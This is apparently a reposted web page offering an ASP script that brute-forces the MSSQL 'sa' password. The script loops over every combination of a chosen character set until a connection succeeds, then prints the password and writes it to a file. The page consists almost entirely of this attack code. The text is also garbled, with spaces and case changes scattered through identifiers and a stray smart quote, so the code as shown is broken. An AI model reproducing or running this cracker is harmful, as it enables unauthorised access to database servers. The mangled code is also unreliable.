Brute-force cracking of the MSSQL User Password asp program

An ASP program that brute-force cracking MSSQL user password. The following versions can be used to close the browser after running. After running, a result file will be generated in the current directory.

CODE:
 

<%
'============ ASP Port export by lake2 ======================================
'Http: // lake2.0 × 54. org
'Version: 0.1
'For SpringBoard
'================================================ ==============================
%>
<Style type = "text/css">
Body, td, th {color: # 0000FF; font-family: Verdana, Arial, Helvetica, sans-serif ;}
Body {background-color: # ffffff; font-size: 14px ;}
A: link {color: # 0000FF; text-decoration: none ;}
A: visited {text-decoration: none; color: # 0000FF ;}
A: hover {text-decoration: none; color: # FF0000 ;}
A: active {text-decoration: none; color: # FF0000 ;}
. Buttom {color: # FFFFFF; border: 1px solid # 084B8E; background-color: #719BC5}
. TextBox {border: 1px solid # 084B8E}
. StyleRed {color: # FF0000}
</Style>
<Title> MSSQL Cracker for SpringBoard </title>
<%
Dim Password ()
If Request. Form ("go") <> "1" Then
%>
<Div align = "center"> Welcome to <a href = "http: // lake2.0 × 54. org "target =" _ blank "> http: // lake2.0 × 54. org </a> </div>
<Form name = "form1" method = "post" action = "" onSubmit = "form1.Submit. disabled = true;">
ConnStr:
<Input name = "conn" type = "text" id = "conn" value = "Provider = SQLOLEDB.1; Data Source = 127.0.0.1; User ID = sa; Password = {PASS }; "size =" 70 ">
<Br>
Char:
<Input name = "char" type = "text" id = "char" value = "0123456789" size = "30">
<Br>
Length:
<Input name = "len" type = "text" id = "len" value = "3" size = "4">
<Br>
Path:
<Input name = "path" type = "text" value = "<% = Server.MapPath(“r.txt") %> "size =" 50 ">
<Input name = "CFile" type = "checkbox" id = "CFile" value = "1" checked>
Enablel <br>
<Input name = "go" type = "hidden" id = "go" value = "1">
<Br>
<Input name = "Submit" type = "submit" id = "Submit" value = "Run">
</Form>
<%
Else
Timer1 = timer
Server. ScriptTimeout = 7776000
ConnStr = Request. Form ("Conn ")
Char = request. Form ("char ")
LenChar = Len (Char)
ReDim password (LenChar)
For I = 1 to LenChar
Password (I) = Mid (Char, I, 1)
Next
Length = CInt (request. Form ("len "))
Call LAKE ("")
Response. Write "Done! <Br> Process "& tTime &" s"
If request. Form ("CFile") <> "" Then CreateResult ("Done !" & Vbcrlf & tTime)
End If

Sub LAKE (str)
If Len (str)> = length Then Exit Sub
For j = 1 to LenChar
Pass = str & password (j)
If Len (pass) = length Then Call Crack (pass)
Call LAKE (pass)
Next
End Sub

Sub Crack (str)
On Error Resume Next
Set conn = Server. CreateObject ("ADODB. connection ")
Conn. open Replace (ConnStr, "{PASS}", str)
If Err Then
If Err. Number <>-2147217843 Then
Response. Write (Err. Description & "<BR> ")
Response. End ()
End If
Else
Response. Write ("I Get it! Password is <font color = red> "& str &" </font> <BR> Process "& tTime &" s ")
If request. Form ("CFile") <> "" Then CreateResult (str & vbcrlf & tTime)
Response. End ()
End If
End Sub

Function tTime ()
Timer2 = timer
Thetime = cstr (int (timer2-timer1 ))
TTime = thetime
End Function

Sub CreateResult (t)
Set fs = CreateObject ("Scripting. FileSystemObject ")
Set outfile = fs. CreateTextFile (request. Form ("path "))
Outfile. WriteLine t
Set fs = Nothing
End Sub
%>